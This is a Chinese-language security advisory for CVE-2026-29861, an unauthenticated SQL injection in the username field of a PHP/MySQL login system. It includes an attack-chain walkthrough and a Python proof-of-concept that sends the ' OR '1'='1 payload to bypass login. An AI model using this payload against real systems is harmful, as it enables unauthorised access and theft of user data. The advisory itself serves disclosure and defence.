IPBUF安全漏洞报告
English
CVE-2026-29861 CVSS 9.8 严重

CVE-2026-29861: PHP-MYSQL-User-Login-System SQL注入漏洞

披露日期: 2026-04-10

漏洞信息

漏洞编号
CVE-2026-29861
漏洞类型
SQL注入
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
PHP-MYSQL-User-Login-System

相关标签

SQL注入PHPMySQLWeb安全权限绕过CVE-2026-29861RCE

漏洞概述

PHP-MYSQL-User-Login-System v1.0 在 login.php 的 username 参数处存在 SQL 注入漏洞。由于未对用户输入进行有效的过滤或参数化处理,攻击者无需身份认证即可远程利用此漏洞。成功利用可导致数据库敏感信息泄露、数据篡改,甚至获取服务器控制权,构成严重安全威胁。

技术细节

该漏洞的核心在于 login.php 文件直接将用户提交的 username 参数拼接到 SQL 查询语句中,未使用预处理语句或转义机制。攻击者可以通过发送包含恶意 SQL 代码的 HTTP POST 请求,例如 ' OR '1'='1,来操纵后端数据库的逻辑。这使得攻击者能够绕过身份验证流程,无需密码即可登录系统。此外,利用联合查询(UNION SELECT)技术,攻击者可以读取数据库中的其他表数据,如用户凭据、系统配置等。鉴于 CVSS 评分为 9.8,该漏洞利用难度低且危害极大,直接影响数据的机密性、完整性和可用性。

攻击链分析

STEP 1
1. 侦察
攻击者识别目标系统运行的是 PHP-MYSQL-User-Login-System v1.0,并定位到登录接口 login.php。
STEP 2
2. 构造载荷
攻击者构造特定的 SQL 注入 Payload(如逻辑恒真语句),旨在绕过登录验证或提取数据。
STEP 3
3. 发送请求
攻击者通过 POST 请求将恶意 Payload 注入到 username 参数中发送给服务器。
STEP 4
4. 执行查询
后端数据库直接拼接执行了恶意 SQL 语句,导致认证逻辑失效或返回敏感数据。
STEP 5
5. 达成目标
攻击者成功绕过身份验证进入系统后台,或窃取数据库中的用户信息及配置数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def check_sqli(url): target_url = f"{url}/login.php" # Payload for authentication bypass payload = "' OR '1'='1' -- " # Data payload usually sent in POST request for login data = { "username": payload, "password": "random_password" } try: response = requests.post(target_url, data=data, timeout=5) # Check for successful login indicators (adjust based on actual app response) if response.status_code == 200 and ("dashboard" in response.text.lower() or "welcome" in response.text.lower()): print("[+] Vulnerability confirmed: SQL Injection allows login bypass.") else: print("[-] Exploit failed or unable to confirm.") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": target = "http://127.0.0.1" # Replace with actual target check_sqli(target)

影响范围

PHP-MYSQL-User-Login-System v1.0

防御指南

临时缓解措施
在无法立即升级或修改代码的情况下,建议在 Web 服务器层(如使用 ModSecurity)部署 WAF 规则,拦截包含常见 SQL 注入特征(如单引号、UNION、SELECT、OR 1=1)的请求。同时,暂时限制后台登录页面的访问来源 IP。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表